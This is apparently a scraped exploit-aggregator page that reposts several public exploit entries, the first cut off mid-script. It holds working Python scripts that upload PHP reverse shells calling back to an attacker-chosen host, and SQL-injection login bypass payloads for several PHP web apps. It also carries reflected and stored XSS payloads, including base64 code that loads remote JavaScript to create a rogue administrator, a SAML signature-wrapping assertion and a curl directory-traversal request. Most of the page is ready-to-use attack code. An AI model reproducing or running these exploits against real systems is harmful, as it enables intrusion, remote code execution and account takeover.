print('Exploit Completed') else: print("Invalid Credential") cook =(login.cookies.get_dict()) temp = s.get(url +'/?file=template&action=edit', cookies=cook) soup = BeautifulSoup(temp.text, 'lxml') csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value'] #<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); rev = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/""" rev2=(args.lhost) rev3=(args.lport) rev4=""" 0>&1'");""" php =(rev+rev2+'/'+rev3+rev4) revpayload = { 'cmsimpleDataFileStored':'cmsimpleDataFileStored', 'csrf_token':csrfToken, 'text':php, 'file':'template', 'action':'save', } shell = s.post(url +'/',cookies=cook , data=revpayload) exec = s.get(url+'/') exit() except: pass main()
HireHackking
# Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS) # Date: 9/24/2021 # Exploit Author: Eric Salario # Vendor Homepage: http://www.os4ed.com/ # Software Link: https://opensis.com/download # Version: 8.0 # Tested on: Windows, Linux # CVE : CVE-2021-40310 OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter. 1. Login as "teacher". 2. Navigate to (take attendance): http://demo.opensis.com/ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true Decoded request: GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1 3. XSS triggers PoC Video: https://www.youtube.com/watch?v=aPKPUDmmYpc
HireHackking

Blood Bank System 1.0 - Authentication Bypass

HACKER · %s · %s

# Exploit Title: Blood Bank System 1.0 - Authentication Bypass # Date: 30-9-2021 # Exploit Author: Nitin Sharma (vidvansh) # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/ # Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230 # Version: 1.0 # Tested on: Windows 10 , Apache , Mysql # Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts. #Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. Step 5 – Click forward and now you will be logged in as admin. # PoC: GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://localhost Connection: close Referer: http://localhost/bloodbank/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 # Authentication Bypass: # Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password => Username: ** Random email** Password: ' or 1 -- -
HireHackking
# Exploit Title: Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 30.09.2021 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code # Version: 1.0 # Tested on: Ubuntu import requests from bs4 import BeautifulSoup import sys import random import string import time print(""" [+] Vehicle Service Management System [!] Auth bypass + shell upload = RCE """) time.sleep(2) if len(sys.argv) != 4: print("[~] Usage : python3 exploit.py localhost ip port") exit() site = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>" letters = string.ascii_lowercase name = ''.join(random.choice(letters) for i in range(5)) def LoginAndShellUpload(): print("[+] Try Login") time.sleep(1) login = 'http://'+site+'/vehicle_service/admin/login.php' session = requests.session() post_data = {"username": "' OR 1=1-- -", "password": "aa"} user_login = session.post(login, data=post_data) cookie = session.cookies.get_dict() print('[+]Success login') print('[+]Try Shell upload') time.sleep(2) #shell upload url = 'http://'+site+'/vehicle_service/classes/SystemSettings.php?f=update_settings' cookies = cookie headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------34590800438205826044276614708", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/church_management/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} data = "-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nVehicle Service Management System\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nVSMS - PHP\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"about_us\"\r\n\r\n<p style=\"text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;\">About Us</p><hr style=\"margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));\"><div id=\"Content\" style=\"margin: 0px; padding: 0px; position: relative;\"><div id=\"bannerL\" style=\"margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);\"></div><div id=\"bannerR\" style=\"margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);\"></div><div class=\"boxed\" style=\"margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: center; background-color: rgb(255, 255, 255);\"><div id=\"lipsum\" style=\"margin: 0px; padding: 0px; text-align: justify;\"></div></div></div><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non ultrices tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et malesuada fames ac ante ipsum primis in faucibus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Praesent eleifend interdum est, at gravida erat molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at lacus vehicula, aliquam purus quis, pharetra lorem.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Proin consectetur massa ut quam molestie porta. Donec sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend id, aliquet ut libero. Nunc scelerisque vulputate turpis quis volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum imperdiet, nulla vitae pharetra pretium, magna felis placerat libero, quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci, id vehicula tellus eleifend sit amet.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Morbi id ante vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus pulvinar, eros id ultricies mollis, lectus velit viverra mi, at venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula pretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Ut et urna sapien. Nulla lacinia sagittis felis id cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada, vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque mauris. Quisque sit amet varius augue.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Sed quis imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae nisi. Curabitur at quam ut libero convallis mattis vel eget mauris. Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum non magna at, molestie gravida magna. Aenean neque sapien, volutpat a ullamcorper nec, iaculis quis est.</p>\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489--\r\n" requests.post(url, headers=headers, cookies=cookies, data=data) print('[+]Success!') print('[+]Getting reverse shell') time.sleep(2) def RCE(): path = 'http://'+site+'/vehicle_service/uploads/' html_text = requests.get(path).text soup = BeautifulSoup(html_text, 'html.parser') for link in soup.find_all('a'): data = link.get('href') if ".php" in data: r = requests.get('http://'+site+'/vehicle_service/uploads/'+data) print('[+]Pwned!') LoginAndShellUpload() RCE()
HireHackking

Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation

HACKER · %s · %s

# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping # Date: 09/07/2021 # Exploit Author: Cristian 'void' Giustini # Vendor Homepage: https://www.miniorange.com/ # Software Link: https://www.drupal.org/project/miniorange_saml # Version: 8.x-2.22 (REQUIRED) # Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38) # Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/ # Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036 --- The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML Signature Wrapping Attacks that could allows an attacker to perform privilege escalation attacks. In order to exploit the vulnerability, the plugin must be configured with the "Either SAML reponse or SAML assertion must be signed" options enabled and an empty "x509 certificate". Administrator point of view: - Install a Drupal version (for the PoC the version 9.1.10 has been used) - Configure an external SSO system like Auth0 - Configure the plugin with the Auth0 provider by checking the "Either SAML response or SAML assertion must be signed" and empty "x509 certificate" Attacker point of view: - Register a normal user on the website - Perform a login - Intercept the request with Burp Suite and decode the SAMLResponse parameter - Inject an additional <Saml:Assertion> object before the original one (example here: https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml) (SAMLRaider Burp extension, XSW3 payload) <saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z"> <saml:AudienceRestriction> <saml:Audience>http://localhost:8080</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion> - Replace the username with one with higher privileges (like admin) - Submit the request - Successful exploitation
HireHackking

Payara Micro Community 5.2021.6 - Directory Traversal

HACKER · %s · %s

# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal # Date: 01/10/2021 # Exploit Author: Yasser Khan (N3T_hunt3r) # Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html # Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x # Version: Payara Micro Community 5.2021.6 # Tested on: Linux/Windows OS # CVE : CVE-2021-41381 https://nvd.nist.gov/vuln/detail/CVE-2021-41381 Proof of Concept: Step1: Open the browser check the version of the payara software Step2: Add this Path at end of the URL /.//WEB-INF/classes/META-INF/microprofile-config.properties Step3: Check the response with match containing "payara.security.openid.default.providerURI=" "payara.security.openid.sessionScopedConfiguration=true" Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability. Step5: Alternatively we can use CURL by using this command: Request: curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties Reference: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html https://nvd.nist.gov/vuln/detail/CVE-2021-41381
HireHackking

WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS) # Date: 09.17.2021 # Exploit Author: Andreas Finstad (4ndr34z) # Vendor Homepage: https://www.whatsupgold.com # Version: v.21.0.3, Build 188 # Tested on: Windows 2019 Server # CVE : CVE-2021-41318 # Reference: https://f20.be/cves/poc-cve-2021-41318 Description: Improper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks. Placing a XSS payload in one of the fields reflected onto the application, triggers the exploitation. No CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS. SNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload: # snmpd.conf # An example configuration file for configuring the Net-SNMP agent ('snmpd') # See snmpd.conf(5) man page for details ############################################################################ # SECTION: System Information Setup # syslocation: The [typically physical] location of the system. # Note that setting this value here means that when trying to # perform an snmp SET operation to the sysLocation.0 variable will make # the agent return the "notWritable" error code. IE, including # this token in the snmpd.conf file will disable write access to # the variable. # arguments: location_string sysName Evil-Device sysLocation Somewhere Over The Rainbow sysContact <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))> This is the base64 encoded string: var a=document.createElement("script");a.src="http://192.168.66.46/x.js";document.body.appendChild(a); x.js: var vhost = window.location.protocol+'\/\/'+window.location.host var username = "sysadmin" var password = "me" fetch(vhost+'/NmConsole/api/core/WebUser',{ method: 'POST', headers: { 'Content-Length': '479', 'Accept': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51', 'Content-Type': 'application/json', 'Origin': vhost, 'Referer': vhost+'/NmConsole/', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4', 'Connection': 'close' }, credentials: 'include', body: '{"HomeDeviceGroupID":0,"HomeDeviceGroupPath":"My Network","LanguageID":1033,"UserRightsMask":"0","IsDgarConfigured":false,"Groups" [1],"WebUserID":-1,"UserName":"'+username+'","AuthenticationType":1,"ApplyWebUiSessionTimeout":true,"ApplyLockoutPolicy":false,"ApplyPasswordAging":false,"ApplyPasswordComplexity":false,"ApplySessionPolicy":false,"FailedLoginCount":0,"IsLocked":false,"Password":"'+password+'","UnlockUser":false,"WebConfigurationSettings":"","id":"Wug.model.userManagement.WebUser-2"}' });
HireHackking

Lodging Reservation Management System 1.0 - Authentication Bypass

HACKER · %s · %s

# Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass # Date: 2021-09-20 # Exploit Author: Nitin Sharma(vidvansh) # Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code # Version: v1.0 # Tested on: Windows 10 - XAMPP Server # Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts. #Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. Step 5 – Click forward and now you will be logged in as admin. # PoC: POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+ # Authentication Bypass: # Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password => Username: ' or 1 -- - Password: ' or 1 -- -